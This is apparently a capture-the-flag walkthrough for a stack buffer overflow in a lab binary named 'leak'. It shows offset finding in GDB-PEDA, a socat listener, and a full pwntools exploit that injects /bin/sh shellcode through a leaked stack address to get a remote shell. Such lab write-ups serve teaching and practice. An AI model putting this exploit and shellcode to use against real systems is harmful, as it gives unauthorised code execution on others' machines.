Buffer Overflows

Finding the Offset

Let's casually find the offset by printing "A" in python and passing it to the binary until Segmentation fault.

python -c 'print("A" * 100)'|./leak

Check the Security Properties of Binary

apt-get -y install checksec
checksec ./leak

Ghidra Code Browser

fgets() is vulnerable to buffer overflow.

In GDB-PEDA, the command x/wx $rsp is used to examine the memory content at the address pointed to by the stack pointer ($rsp). Let's break down the command:

x: This is the "examine" command in GDB, used to inspect memory content.
/wx: These are the modifiers for the examine command. The /w specifies that we want to display the memory as a 32-bit word (4 bytes), and the /x specifies that we want to display the memory content in hexadecimal format.
$rsp: This is a GDB register variable representing the stack pointer. The stack pointer holds the memory address of the top of the stack.

Putting it all together, x/wx $rsp will show you the 32-bit word at the memory location pointed to by the stack pointer in hexadecimal format.

gdb -q ./leak
gdb-peda$ pattern_create 100
gdb-peda$ run
gdb-peda$ x/wx $rsp
gdb-peda$ pattern offset 0x65413149

Open Port using Socat on Target

www-data@jet:~$ socat TCP-LISTEN:9999,reuseaddr,fork EXEC:/home/leak &

Create BOF exploit using PwnTools Library

#!/usr/bin/python3
from pwn import remote, p64

shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"  

offset = 72
junk = b"A" * (offset - len(shellcode))

shell = remote('10.13.37.10', 9999)
shell.recvuntil(b"Oops, I'm leaking! ")

leak = int(shell.recvuntil(b"\n"),16)  
ret = p64(leak)

payload = shellcode + junk + ret  

shell.recvuntil(b"> ")
shell.sendline(payload)
shell.interactive()

Execute Exploit and Gain shell

python3 bof.py

PreviousCracking NextCloud Security

Last updated 2 years ago